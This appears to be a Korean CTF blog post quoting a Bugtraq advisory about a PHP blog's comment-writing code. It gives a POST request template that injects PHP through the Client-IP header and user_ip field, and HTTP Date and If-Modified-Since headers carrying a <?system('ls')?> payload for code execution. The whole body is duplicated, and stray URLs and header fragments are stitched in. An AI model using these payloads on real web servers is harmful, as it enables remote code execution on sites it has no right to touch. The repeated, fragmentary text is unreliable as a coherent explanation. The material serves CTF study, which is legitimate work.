http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html
471| function write_comment ( $y, $m, $entry, $comment_name,
| $comment_email, $comment_url, $comment_text, $user_ip,
| $hold_flag='', $comment_date=null ) {
|
478| $basedir = 'content/';
479| $dir = $basedir.$y.'/'.$m.'/'.$entry;
|
494| $dir .= '/comments';
|
506| $dir .= '/';
|
512| $stamp = date('ymd-His');
513| if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
514| $entryFile = $dir.'comment'.$stamp.'.txt.gz';
515| } else {
516| $entryFile = $dir.'comment'.$stamp.'.txt';
517| }
The variables $y, $m and $entry are sent with the HTTP request.
The filename is decided with the date() function. There is many
ways for know the content returned by $stamp:
- Ask the server by sending an HTTP request (the "Date" header).
- Bruteforce the path (Add several html tags).
- Divide our attack in two parts (filenames are displayed in the html source)
POST /comment_add_cgi.php HTTP/1.1
Host: localhost
Connection: keep-alive
Cookie: PHPSESSID=<SID>
Client-IP: <HTML_AND_PHP_CONTENT>
Content-Type: application/x-www-form-urlencoded
Content-Length: <LEN>
y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker &comment_email=my%40you.com&comment_url=&user_ip=
<HTML_AND_PHP_CONTENT_URLENCODED>
&style_dropdown=--&comment_text=Hello&comment_capcha
=128619&submit=%A0Post+Comment%A0
http://blog.naver.com/hanoul76psy?Redirect=Log&logNo=96001395
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
Date: Tue, 15 Nov 1994 08:12:31 GMT
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 <?system('ls')?>
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Modified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Unmodified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
about http 1.1
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
471| function write_comment ( $y, $m, $entry, $comment_name,
| $comment_email, $comment_url, $comment_text, $user_ip,
| $hold_flag='', $comment_date=null ) {
|
478| $basedir = 'content/';
479| $dir = $basedir.$y.'/'.$m.'/'.$entry;
|
494| $dir .= '/comments';
|
506| $dir .= '/';
|
512| $stamp = date('ymd-His');
513| if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
514| $entryFile = $dir.'comment'.$stamp.'.txt.gz';
515| } else {
516| $entryFile = $dir.'comment'.$stamp.'.txt';
517| }
The variables $y, $m and $entry are sent with the HTTP request.
The filename is decided with the date() function. There is many
ways for know the content returned by $stamp:
- Ask the server by sending an HTTP request (the "Date" header).
- Bruteforce the path (Add several html tags).
- Divide our attack in two parts (filenames are displayed in the html source)
POST /comment_add_cgi.php HTTP/1.1
Host: localhost
Connection: keep-alive
Cookie: PHPSESSID=<SID>
Client-IP: <HTML_AND_PHP_CONTENT>
Content-Type: application/x-www-form-urlencoded
Content-Length: <LEN>
y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker &comment_email=my%40you.com&comment_url=&user_ip=
<HTML_AND_PHP_CONTENT_URLENCODED>
&style_dropdown=--&comment_text=Hello&comment_capcha
=128619&submit=%A0Post+Comment%A0
http://blog.naver.com/hanoul76psy?Redirect=Log&logNo=96001395
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
Date: Tue, 15 Nov 1994 08:12:31 GMT
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 <?system('ls')?>
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Modified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
If-Unmodified-Since: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: Tue, 15 Nov 1994 08:12:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
Date: <?system('ls')?>, 10 Dec 2010 08:25:31 GMT
about http 1.1
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
'컴터 때찌 > CTF' 카테고리의 다른 글
| [Codegate 2011] Vuln400 (3) | 2011.03.10 |
|---|---|
| [Codegate 2011] Vuln200 (0) | 2011.03.10 |
| [Codegate 2011] Vuln100 (0) | 2011.03.10 |
| Padocon 2011 WTF400(Doc) (0) | 2011.01.21 |
| 천사 같은 올드좀비님의 webhacking.kr 클리어 (2) | 2010.12.24 |
